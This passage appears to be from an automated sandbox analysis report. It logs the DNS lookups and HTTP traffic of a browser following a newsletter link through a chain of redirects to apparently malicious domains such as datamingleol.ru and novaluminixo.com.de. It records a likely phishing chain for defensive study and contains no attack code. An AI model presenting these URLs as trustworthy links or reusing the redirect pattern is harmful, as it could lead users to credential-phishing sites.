                                      Sep 13, 2024 15:15:51.321113110 CEST192.168.2.41.1.1.10x6de4Standard query (0)datamingleol.ruA (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:15:51.321597099 CEST192.168.2.41.1.1.10xfb87Standard query (0)datamingleol.ru65IN (0x0001)false
                                      Sep 13, 2024 15:15:53.672171116 CEST192.168.2.41.1.1.10x6c04Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:15:53.673847914 CEST192.168.2.41.1.1.10xd0f7Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                      Sep 13, 2024 15:15:55.087140083 CEST192.168.2.41.1.1.10xe222Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:15:55.087583065 CEST192.168.2.41.1.1.10x6f21Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                      Sep 13, 2024 15:15:55.088418961 CEST192.168.2.41.1.1.10x23dfStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:15:55.088668108 CEST192.168.2.41.1.1.10xb7a5Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                      Sep 13, 2024 15:15:59.144675970 CEST192.168.2.41.1.1.10x6301Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:15:59.144949913 CEST192.168.2.41.1.1.10x35c5Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                      Sep 13, 2024 15:16:18.862121105 CEST192.168.2.41.1.1.10x160bStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:18.862554073 CEST192.168.2.41.1.1.10xf420Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                      Sep 13, 2024 15:16:19.693836927 CEST192.168.2.41.1.1.10xca1fStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:19.694559097 CEST192.168.2.41.1.1.10x980bStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                      Sep 13, 2024 15:16:19.768282890 CEST192.168.2.41.1.1.10x8065Standard query (0)novaluminixo.com.deA (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:19.768716097 CEST192.168.2.41.1.1.10xaa2bStandard query (0)novaluminixo.com.de65IN (0x0001)false
                                      Sep 13, 2024 15:16:24.430097103 CEST192.168.2.41.1.1.10x1fbdStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:24.430274010 CEST192.168.2.41.1.1.10x6b63Standard query (0)code.jquery.com65IN (0x0001)false
                                      Sep 13, 2024 15:16:24.453233957 CEST192.168.2.41.1.1.10x22b1Standard query (0)novaluminixo.com.deA (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:24.453502893 CEST192.168.2.41.1.1.10xb61fStandard query (0)novaluminixo.com.de65IN (0x0001)false
                                      Sep 13, 2024 15:16:25.872204065 CEST192.168.2.41.1.1.10xa21Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:25.884850979 CEST192.168.2.41.1.1.10xd8d6Standard query (0)code.jquery.com65IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Sep 13, 2024 15:15:47.093983889 CEST1.1.1.1192.168.2.40x6f6eNo error (0)link.sbstck.com65IN (0x0001)false
                                      Sep 13, 2024 15:15:47.095073938 CEST1.1.1.1192.168.2.40x8ba2No error (0)link.sbstck.com188.114.97.3A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:15:47.095073938 CEST1.1.1.1192.168.2.40x8ba2No error (0)link.sbstck.com188.114.96.3A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:15:47.113317966 CEST1.1.1.1192.168.2.40xb382No error (0)link.sbstck.com65IN (0x0001)false
                                      Sep 13, 2024 15:15:47.113387108 CEST1.1.1.1192.168.2.40x2c05No error (0)link.sbstck.com188.114.96.3A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:15:47.113387108 CEST1.1.1.1192.168.2.40x2c05No error (0)link.sbstck.com188.114.97.3A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:15:48.667531013 CEST1.1.1.1192.168.2.40x972No error (0)link.mail.beehiiv.com104.18.68.40A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:15:48.667531013 CEST1.1.1.1192.168.2.40x972No error (0)link.mail.beehiiv.com104.18.69.40A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:15:48.667552948 CEST1.1.1.1192.168.2.40x206fNo error (0)link.mail.beehiiv.com65IN (0x0001)false
                                      Sep 13, 2024 15:15:49.580104113 CEST1.1.1.1192.168.2.40xc133No error (0)www.google.com65IN (0x0001)false
                                      Sep 13, 2024 15:15:49.582577944 CEST1.1.1.1192.168.2.40x6352No error (0)www.google.com142.250.185.228A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:15:50.046917915 CEST1.1.1.1192.168.2.40x70c9No error (0)maxcarerelocation.com45.67.14.24A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:15:51.405850887 CEST1.1.1.1192.168.2.40xfb87No error (0)datamingleol.ru65IN (0x0001)false
                                      Sep 13, 2024 15:15:51.409809113 CEST1.1.1.1192.168.2.40x6de4No error (0)datamingleol.ru188.114.96.3A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:15:51.409809113 CEST1.1.1.1192.168.2.40x6de4No error (0)datamingleol.ru188.114.97.3A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:15:53.679152966 CEST1.1.1.1192.168.2.40x6c04No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:15:53.679152966 CEST1.1.1.1192.168.2.40x6c04No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:15:53.680772066 CEST1.1.1.1192.168.2.40xd0f7No error (0)challenges.cloudflare.com65IN (0x0001)false
                                      Sep 13, 2024 15:15:55.094017982 CEST1.1.1.1192.168.2.40xe222No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:15:55.094017982 CEST1.1.1.1192.168.2.40xe222No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:15:55.094739914 CEST1.1.1.1192.168.2.40x6f21No error (0)challenges.cloudflare.com65IN (0x0001)false
                                      Sep 13, 2024 15:15:55.095177889 CEST1.1.1.1192.168.2.40x23dfNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:15:55.095177889 CEST1.1.1.1192.168.2.40x23dfNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:15:55.095457077 CEST1.1.1.1192.168.2.40xb7a5No error (0)challenges.cloudflare.com65IN (0x0001)false
                                      Sep 13, 2024 15:15:59.151509047 CEST1.1.1.1192.168.2.40x6301No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:00.443459034 CEST1.1.1.1192.168.2.40xc6ccNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:00.443459034 CEST1.1.1.1192.168.2.40xc6ccNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:02.858469009 CEST1.1.1.1192.168.2.40xe757No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                      Sep 13, 2024 15:16:02.858469009 CEST1.1.1.1192.168.2.40xe757No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:14.914129019 CEST1.1.1.1192.168.2.40x1becNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                      Sep 13, 2024 15:16:14.914129019 CEST1.1.1.1192.168.2.40x1becNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:18.869329929 CEST1.1.1.1192.168.2.40x160bNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:18.869329929 CEST1.1.1.1192.168.2.40x160bNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:18.869856119 CEST1.1.1.1192.168.2.40xf420No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                      Sep 13, 2024 15:16:19.701191902 CEST1.1.1.1192.168.2.40xca1fNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:19.701191902 CEST1.1.1.1192.168.2.40xca1fNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:19.701739073 CEST1.1.1.1192.168.2.40x980bNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                      Sep 13, 2024 15:16:19.785361052 CEST1.1.1.1192.168.2.40xaa2bNo error (0)novaluminixo.com.de65IN (0x0001)false
                                      Sep 13, 2024 15:16:19.787015915 CEST1.1.1.1192.168.2.40x8065No error (0)novaluminixo.com.de188.114.96.3A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:19.787015915 CEST1.1.1.1192.168.2.40x8065No error (0)novaluminixo.com.de188.114.97.3A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:24.437355995 CEST1.1.1.1192.168.2.40x1fbdNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:24.437355995 CEST1.1.1.1192.168.2.40x1fbdNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:24.437355995 CEST1.1.1.1192.168.2.40x1fbdNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:24.437355995 CEST1.1.1.1192.168.2.40x1fbdNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:24.479304075 CEST1.1.1.1192.168.2.40x22b1No error (0)novaluminixo.com.de188.114.96.3A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:24.479304075 CEST1.1.1.1192.168.2.40x22b1No error (0)novaluminixo.com.de188.114.97.3A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:24.485083103 CEST1.1.1.1192.168.2.40xb61fNo error (0)novaluminixo.com.de65IN (0x0001)false
                                      Sep 13, 2024 15:16:25.879657984 CEST1.1.1.1192.168.2.40xa21No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:25.879657984 CEST1.1.1.1192.168.2.40xa21No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:25.879657984 CEST1.1.1.1192.168.2.40xa21No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:25.879657984 CEST1.1.1.1192.168.2.40xa21No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:38.146076918 CEST1.1.1.1192.168.2.40x1a75No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                      Sep 13, 2024 15:16:38.146076918 CEST1.1.1.1192.168.2.40x1a75No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                      Sep 13, 2024 15:16:57.777756929 CEST1.1.1.1192.168.2.40x457cNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                      Sep 13, 2024 15:16:57.777756929 CEST1.1.1.1192.168.2.40x457cNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                      • link.sbstck.com
                                      • https:
                                        • link.mail.beehiiv.com
                                        • maxcarerelocation.com
                                        • datamingleol.ru
                                        • challenges.cloudflare.com
                                        • cdnjs.cloudflare.com
                                        • novaluminixo.com.de
                                        • code.jquery.com
                                      • fs.microsoft.com
                                      • a.nel.cloudflare.com
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449738188.114.96.34434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:15:48 UTC703OUTGET /redirect/9f1a559b-1924-42a1-ac63-d801d0b621e3 HTTP/1.1
                                      Host: link.sbstck.com
                                      Connection: keep-alive
                                      Upgrade-Insecure-Requests: 1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Sec-Fetch-Site: none
                                      Sec-Fetch-Mode: navigate
                                      Sec-Fetch-User: ?1
                                      Sec-Fetch-Dest: document
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      sec-ch-ua-platform: "Windows"
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:15:48 UTC1260INHTTP/1.1 200 OK
                                      Date: Fri, 13 Sep 2024 13:15:48 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      set-cookie: AWSALBTG=5n1opfkQe2jz3PLFvyUzhHRNX67kZNEVnAwl07a9cLvkLJaYz/19Iwa1SsErfDHu+/zogWpetkGJMg/QpDZkNWLsQskkxuVxmEwT6bLCoUj0UCpS40MXzaX3xb1zDWGAO7uBR/LCReVL5FLd79EsLT5TFy7Oz5wkWbuTgcGcUXMj; Expires=Fri, 20 Sep 2024 13:15:48 GMT; Path=/
                                      set-cookie: AWSALBTGCORS=5n1opfkQe2jz3PLFvyUzhHRNX67kZNEVnAwl07a9cLvkLJaYz/19Iwa1SsErfDHu+/zogWpetkGJMg/QpDZkNWLsQskkxuVxmEwT6bLCoUj0UCpS40MXzaX3xb1zDWGAO7uBR/LCReVL5FLd79EsLT5TFy7Oz5wkWbuTgcGcUXMj; Expires=Fri, 20 Sep 2024 13:15:48 GMT; Path=/; SameSite=None; Secure
                                      set-cookie: cookie_storage_key=953fdc8e-085b-499c-a2d4-9e8496f56f3c; Max-Age=7776000; Domain=link.sbstck.com; Path=/; Expires=Thu, 12 Dec 2024 13:15:48 GMT; Secure; SameSite=None
                                      set-cookie: ajs_anonymous_id=%2265198caa-2ae4-4243-a251-c74d1517dc46%22; Max-Age=31536000; Domain=link.sbstck.com; Path=/; Expires=Sat, 13 Sep 2025 13:15:48 GMT; SameSite=Strict
                                      set-cookie: visit_id=%7B%22id%22%3A%2225c1f961-6ae7-4dba-9356-50e68b285db3%22%2C%22timestamp%22%3A%222024-09-13T13%3A15%3A48.256Z%22%7D; Max-Age=1800; Domain=link.sbstck.com; Path=/; Expires=Fri, 13 Sep 2024 13:45:48 GMT; HttpOnly; SameSite=Strict
                                      2024-09-13 13:15:48 UTC900INData Raw: 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 61 62 5f 74 65 73 74 69 6e 67 5f 69 64 3d 25 32 32 6f 72 2d 63 66 38 34 39 38 63 32 2d 30 34 36 38 2d 34 32 32 38 2d 61 35 37 39 2d 64 30 39 38 34 32 30 61 63 66 32 62 25 32 32 3b 20 4d 61 78 2d 41 67 65 3d 33 31 35 33 36 30 30 30 3b 20 44 6f 6d 61 69 6e 3d 6c 69 6e 6b 2e 73 62 73 74 63 6b 2e 63 6f 6d 3b 20 50 61 74 68 3d 2f 3b 20 45 78 70 69 72 65 73 3d 53 61 74 2c 20 31 33 20 53 65 70 20 32 30 32 35 20 31 33 3a 31 35 3a 34 38 20 47 4d 54 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 45 78 70 72 65 73 73 0d 0a 78 2d 73 65 72 76 65 64 2d 62 79 3a 20 53 75 62 73 74 61 63 6b 0d 0a 78 2d 63 6c 75 73 74 65 72 3a 20 73 75 62 73
                                      Data Ascii: set-cookie: ab_testing_id=%22or-cf8498c2-0468-4228-a579-d098420acf2b%22; Max-Age=31536000; Domain=link.sbstck.com; Path=/; Expires=Sat, 13 Sep 2025 13:15:48 GMT; HttpOnly; Secure; SameSite=Laxx-powered-by: Expressx-served-by: Substackx-cluster: subs
                                      2024-09-13 13:15:48 UTC1369INData Raw: 39 61 38 0d 0a 3c 68 65 61 64 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 4d 45 54 41 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 55 52 4c 3d 68 74 74 70 73 3a 2f 2f 6c 69 6e 6b 2e 6d 61 69 6c 2e 62 65 65 68 69 69 76 2e 63 6f 6d 2f 6c 73 2f 63 6c 69 63 6b 3f 75 70 6e 3d 75 30 30 31 2e 47 6e 61 79 5a 70 71 6d 44 41 79 7a 52 67 53 2d 32 46 4c 59 6c 34 52 48 4e 32 63 55 66 46 4f 65 49 6c 2d 32 46 31 66 34 78 55 34 70 4a 4f 63 4f 76 46 46 35 4a 74 63 44 5a 67 4e 32 62 38 45 48 41 59 61 49 6f 38 68 59 2d 32 46 69 53 4f 55 62 76 43 64 4e 38 33 62 6a 61 72 37 37 5a 36 45 55 67 77 79 49 2d 32 46 43 79 2d 32 42 74 58 75 71 50 7a 73 6c 68 65 47 42 38 66 63 5a 54 50 4d 54 37 71 46 62 49 76 53 78 36 4a 33 71 55 31 33 61
                                      Data Ascii: 9a8<head><noscript><META http-equiv="refresh" content="0;URL=https://link.mail.beehiiv.com/ls/click?upn=u001.GnayZpqmDAyzRgS-2FLYl4RHN2cUfFOeIl-2F1f4xU4pJOcOvFF5JtcDZgN2b8EHAYaIo8hY-2FiSOUbvCdN83bjar77Z6EUgwyI-2FCy-2BtXuqPzslheGB8fcZTPMT7qFbIvSx6J3qU13a
                                      2024-09-13 13:15:48 UTC1110INData Raw: 66 65 37 53 35 61 6a 50 53 50 56 63 30 39 75 63 64 67 44 64 69 35 6f 34 74 52 53 59 52 73 77 32 38 41 78 43 4d 77 70 35 42 75 36 44 6d 58 39 71 42 67 53 4f 43 61 4e 2d 32 42 65 57 6d 64 78 43 34 38 46 4a 52 30 69 64 6a 5a 43 32 55 46 51 47 44 62 4d 51 6d 66 64 48 38 47 63 50 48 72 55 77 64 33 42 6a 79 59 37 51 4d 2d 32 42 54 49 4f 6d 48 44 5a 66 6c 44 6c 5a 57 2d 32 42 78 6b 57 6e 30 4d 78 4b 4c 52 64 4f 41 45 34 59 76 70 61 33 6e 47 64 37 4f 46 48 4b 46 7a 61 6e 44 49 44 39 4e 57 41 6a 54 48 4f 4f 4b 4f 6c 44 46 38 31 69 57 7a 74 65 32 4c 76 6e 4f 50 6b 31 64 6a 42 2d 32 42 35 52 41 72 62 5a 35 43 4c 6f 58 71 78 4e 79 4f 54 66 44 4b 4b 72 71 32 4b 38 72 26 23 33 38 3b 75 74 6d 5f 73 6f 75 72 63 65 3d 73 75 62 73 74 61 63 6b 26 23 33 38 3b 75 74 6d 5f 6d
                                      Data Ascii: fe7S5ajPSPVc09ucdgDdi5o4tRSYRsw28AxCMwp5Bu6DmX9qBgSOCaN-2BeWmdxC48FJR0idjZC2UFQGDbMQmfdH8GcPHrUwd3BjyY7QM-2BTIOmHDZflDlZW-2BxkWn0MxKLRdOAE4Yvpa3nGd7OFHKFzanDID9NWAjTHOOKOlDF81iWzte2LvnOPk1djB-2B5RArbZ5CLoXqxNyOTfDKKrq2K8r&#38;utm_source=substack&#38;utm_m
                                      2024-09-13 13:15:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.449739104.18.68.404434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:15:49 UTC1423OUTGET /ls/click?upn=u001.GnayZpqmDAyzRgS-2FLYl4RHN2cUfFOeIl-2F1f4xU4pJOcOvFF5JtcDZgN2b8EHAYaIo8hY-2FiSOUbvCdN83bjar77Z6EUgwyI-2FCy-2BtXuqPzslheGB8fcZTPMT7qFbIvSx6J3qU13aPN2aWg8H0AZlaYIbwj-2B5XCPZJrYLR6gCX2KglI5rt-2BhosHmI3CIqw-2Baty2WnLa_5fUuPhWAFqmONK4vCqUUyg-2FVOuPn0yylbEGIy-2BMc2pKH-2FwT7XuJE6N4PO67SRFwySQfum6vpDJ012hBFpTMU70W7Buir5ITVUf4LKn1Jv3b9pmU2VE9FhtalGjGwNilzoSAQqq5GJ-2FYB4GD3Q-2Bxi0yZ0veGliTbI5N6309WAW1tAR5CJ0NAA3kd01PnWFZtXGE2PY7nO0TG-2BRlhqE6O-2BZ73glfaX9R5tgL90omfK9VLfe7S5ajPSPVc09ucdgDdi5o4tRSYRsw28AxCMwp5Bu6DmX9qBgSOCaN-2BeWmdxC48FJR0idjZC2UFQGDbMQmfdH8GcPHrUwd3BjyY7QM-2BTIOmHDZflDlZW-2BxkWn0MxKLRdOAE4Yvpa3nGd7OFHKFzanDID9NWAjTHOOKOlDF81iWzte2LvnOPk1djB-2B5RArbZ5CLoXqxNyOTfDKKrq2K8r&utm_source=substack&utm_medium=email HTTP/1.1
                                      Host: link.mail.beehiiv.com
                                      Connection: keep-alive
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      sec-ch-ua-platform: "Windows"
                                      Upgrade-Insecure-Requests: 1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Sec-Fetch-Site: cross-site
                                      Sec-Fetch-Mode: navigate
                                      Sec-Fetch-Dest: document
                                      Referer: https://link.sbstck.com/
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:15:50 UTC659INHTTP/1.1 302 Found
                                      Date: Fri, 13 Sep 2024 13:15:49 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Location: https://maxcarerelocation.com?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-review
                                      X-Robots-Tag: noindex, nofollow
                                      CF-Cache-Status: DYNAMIC
                                      Set-Cookie: __cf_bm=nVGUwKZ89tiKnsN5A8i4CS472l7TS3nbyWDSL60z3ys-1726233349-1.0.1.1-0I2fTdN_UuLzqLtMsWcMSQhRNVHtuUzaw1vm7wu8rVVaSYf03JTV0rmpPveB8OmntIQ2SJa.xa2Fy5oK9Uz4Vw; path=/; expires=Fri, 13-Sep-24 13:45:49 GMT; domain=.beehiiv.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8c2868831e9c43d9-EWR
                                      2024-09-13 13:15:50 UTC159INData Raw: 39 39 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 78 63 61 72 65 72 65 6c 6f 63 61 74 69 6f 6e 2e 63 6f 6d 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 71 75 65 6c 6c 61 73 2d 6e 65 77 73 6c 65 74 74 65 72 2e 62 65 65 68 69 69 76 2e 63 6f 6d 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 6e 65 77 73 6c 65 74 74 65 72 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 66 69 6c 65 2d 66 6f 72 2d 72 65 76 69 65 77 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a 0d 0a
                                      Data Ascii: 99<a href="https://maxcarerelocation.com?utm_source=quellas-newsletter.beehiiv.com&amp;utm_medium=newsletter&amp;utm_campaign=file-for-review">Found</a>.
                                      2024-09-13 13:15:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.449743184.28.90.27443
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:15:50 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                      Connection: Keep-Alive
                                      Accept: */*
                                      Accept-Encoding: identity
                                      User-Agent: Microsoft BITS/7.8
                                      Host: fs.microsoft.com
                                      2024-09-13 13:15:51 UTC467INHTTP/1.1 200 OK
                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                      Content-Type: application/octet-stream
                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                      Server: ECAcc (lpl/EF67)
                                      X-CID: 11
                                      X-Ms-ApiVersion: Distribute 1.2
                                      X-Ms-Region: prod-neu-z1
                                      Cache-Control: public, max-age=185403
                                      Date: Fri, 13 Sep 2024 13:15:50 GMT
                                      Connection: close
                                      X-CID: 2


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.44974245.67.14.244434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:15:51 UTC778OUTGET /?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-review HTTP/1.1
                                      Host: maxcarerelocation.com
                                      Connection: keep-alive
                                      Upgrade-Insecure-Requests: 1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Sec-Fetch-Site: cross-site
                                      Sec-Fetch-Mode: navigate
                                      Sec-Fetch-Dest: document
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      sec-ch-ua-platform: "Windows"
                                      Referer: https://link.sbstck.com/
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:15:51 UTC467INHTTP/1.1 301 Moved Permanently
                                      Connection: close
                                      content-type: text/html
                                      content-length: 707
                                      date: Fri, 13 Sep 2024 13:15:51 GMT
                                      server: LiteSpeed
                                      location: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-review
                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                      2024-09-13 13:15:51 UTC707INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76
                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helv


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.449744184.28.90.27443
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:15:51 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                      Connection: Keep-Alive
                                      Accept: */*
                                      Accept-Encoding: identity
                                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                      Range: bytes=0-2147483646
                                      User-Agent: Microsoft BITS/7.8
                                      Host: fs.microsoft.com
